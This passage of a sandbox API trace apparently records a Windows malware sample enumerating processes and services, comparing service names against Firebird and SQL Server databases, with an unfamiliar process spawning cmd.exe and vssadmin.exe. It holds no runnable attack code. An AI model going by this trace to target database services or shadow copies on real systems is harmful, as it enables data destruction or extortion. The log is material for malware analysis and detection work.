lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0320.269] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0320.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0320.269] lstrlenW (lpString="Power") returned 5 [0320.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0320.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0320.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0320.270] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0320.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0320.270] lstrlenW (lpString="ProfSvc") returned 7 [0320.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0320.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0320.270] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0320.270] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0320.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0320.270] lstrlenW (lpString="RpcEptMapper") returned 12 [0320.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0320.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0320.270] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0320.270] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0320.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0320.270] lstrlenW (lpString="RpcSs") returned 5 [0320.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0320.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0320.270] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0320.270] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0320.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0320.270] lstrlenW (lpString="SamSs") returned 5 [0320.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0320.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0320.271] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0320.271] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0320.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0320.271] lstrlenW (lpString="Schedule") returned 8 [0320.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0320.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0320.271] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0320.271] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0320.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0320.271] lstrlenW (lpString="SecurityHealthService") returned 21 [0320.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0320.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0320.271] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0320.271] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0320.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0320.271] lstrlenW (lpString="SENS") returned 4 [0320.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0320.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0320.271] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0320.271] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0320.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0320.271] lstrlenW (lpString="ShellHWDetection") returned 16 [0320.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0320.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0320.271] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0320.271] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0320.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0320.272] lstrlenW (lpString="Spooler") returned 7 [0320.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0320.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0320.272] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0320.272] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0320.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0320.272] lstrlenW (lpString="StateRepository") returned 15 [0320.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0320.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0320.272] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0320.272] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0320.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0320.272] lstrlenW (lpString="SysMain") returned 7 [0320.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0320.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0320.272] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0320.272] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0320.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0320.272] lstrlenW (lpString="SystemEventsBroker") returned 18 [0320.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0320.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0320.272] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0320.272] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0320.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0320.272] lstrlenW (lpString="Themes") returned 6 [0320.273] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0320.273] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0320.273] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0320.273] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0320.273] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41549e0 | out: hHeap=0x470000) returned 1 [0320.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x554 [0320.356] Process32FirstW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0320.356] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0320.357] lstrlenW (lpString="System") returned 6 [0320.357] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0320.358] lstrlenW (lpString="smss.exe") returned 8 [0320.358] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0320.359] lstrlenW (lpString="csrss.exe") returned 9 [0320.359] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0320.360] lstrlenW (lpString="wininit.exe") returned 11 [0320.360] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0320.361] lstrlenW (lpString="csrss.exe") returned 9 [0320.361] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0320.361] lstrlenW (lpString="winlogon.exe") returned 12 [0320.361] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0320.362] lstrlenW (lpString="services.exe") returned 12 [0320.362] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0320.363] lstrlenW (lpString="lsass.exe") returned 9 [0320.363] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0320.363] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0320.364] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0320.365] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0320.365] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.366] lstrlenW (lpString="svchost.exe") returned 11 [0320.366] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.367] lstrlenW (lpString="svchost.exe") returned 11 [0320.367] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0320.367] lstrlenW (lpString="dwm.exe") returned 7 [0320.367] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.368] lstrlenW (lpString="svchost.exe") returned 11 [0320.368] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.369] lstrlenW (lpString="svchost.exe") returned 11 [0320.369] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.370] lstrlenW (lpString="svchost.exe") returned 11 [0320.370] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.371] lstrlenW (lpString="svchost.exe") returned 11 [0320.371] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.372] lstrlenW (lpString="svchost.exe") returned 11 [0320.372] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.373] lstrlenW (lpString="svchost.exe") returned 11 [0320.373] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.373] lstrlenW (lpString="svchost.exe") returned 11 [0320.374] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.374] lstrlenW (lpString="svchost.exe") returned 11 [0320.374] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.375] lstrlenW (lpString="svchost.exe") returned 11 [0320.375] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.376] lstrlenW (lpString="svchost.exe") returned 11 [0320.376] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0320.376] lstrlenW (lpString="spoolsv.exe") returned 11 [0320.376] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.377] lstrlenW (lpString="svchost.exe") returned 11 [0320.377] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0320.378] lstrlenW (lpString="audiodg.exe") returned 11 [0320.378] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0320.438] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0320.438] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0320.438] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0320.438] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0320.439] lstrlenW (lpString="Memory Compression") returned 18 [0320.439] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0320.440] lstrlenW (lpString="sihost.exe") returned 10 [0320.440] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.440] lstrlenW (lpString="svchost.exe") returned 11 [0320.440] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0320.441] lstrlenW (lpString="taskhostw.exe") returned 13 [0320.441] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0320.442] lstrlenW (lpString="explorer.exe") returned 12 [0320.442] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0320.442] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0320.442] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0320.443] lstrlenW (lpString="SearchUI.exe") returned 12 [0320.443] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0320.444] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0320.444] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0320.444] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0320.444] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0320.445] lstrlenW (lpString="wdgmug.exe") returned 10 [0320.445] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0320.446] lstrlenW (lpString="cmd.exe") returned 7 [0320.446] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0320.447] lstrlenW (lpString="conhost.exe") returned 11 [0320.447] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0320.448] lstrlenW (lpString="vssadmin.exe") returned 12 [0320.448] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0320.449] lstrlenW (lpString="consent.exe") returned 11 [0320.449] Process32NextW (in: hSnapshot=0x554, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0320.450] CloseHandle (hObject=0x554) returned 1 [0320.450] Sleep (dwMilliseconds=0x1f4) [0321.677] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a008 [0321.678] EnumServicesStatusExW (in: hSCManager=0x401a008, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0321.679] GetLastError () returned 0xea [0321.679] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1cb6) returned 0x41549e0 [0321.680] EnumServicesStatusExW (in: hSCManager=0x401a008, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x41549e0, cbBufSize=0x1cb6, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x41549e0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0321.682] CloseServiceHandle (hSCObject=0x401a008) returned 1 [0321.682] lstrlenW (lpString="Appinfo") returned 7 [0321.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0321.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0321.682] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0321.682] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0321.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0321.682] lstrlenW (lpString="AppXSvc") returned 7 [0321.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0321.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0321.682] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0321.683] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0321.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0321.683] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0321.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0321.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0321.683] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0321.683] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0321.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0321.683] lstrlenW (lpString="Audiosrv") returned 8 [0321.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0321.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0321.683] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0321.683] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0321.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0321.683] lstrlenW (lpString="BFE") returned 3 [0321.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0321.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0321.684] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0321.684] lstrcmpiW (lpString1="mssqlserver", 